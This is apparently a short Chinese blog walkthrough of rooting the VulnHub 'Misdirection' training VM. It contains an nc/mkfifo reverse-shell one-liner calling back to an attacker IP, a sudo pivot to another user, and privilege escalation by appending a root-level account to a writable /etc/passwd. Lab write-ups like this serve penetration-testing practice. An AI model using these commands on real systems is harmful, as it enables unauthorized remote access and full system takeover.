vulnhub-Misdirection-类oscp靶机

由 admin 发布

信息搜集

目录扫描

http://ip:8080/debug/

监听,反弹 shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.31.134 2233 >/tmp/f

初次访问

www-data

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@misdirection:/var/www/html/debug$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@misdirection:/var/www/html/debug$ sudo -l
sudo -l
Matching Defaults entries for www-data on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on localhost:
    (brexit) NOPASSWD: /bin/bash
www-data@misdirection:/var/www/html/debug$ sudo -u brexit /bin/bash
sudo -u brexit /bin/bash
brexit@misdirection:/var/www/html/debug$ whoami
whoami
brexit

kali

perl -le 'print crypt("password","1salt")' # 生成密码

靶机

brexit@misdirection:~$ echo 'y2:1sh3MD6zSSl9w:0:0::/root:/bin/bash' >>/etc/passwd
<2:1sh3MD6zSSl9w:0:0::/root:/bin/bash' >>/etc/passwd
brexit@misdirection:~$ su y2
su y2
Password: password

root@misdirection:/home/brexit# id
id
uid=0(root) gid=0(root) groups=0(root)

暂无评论

发表评论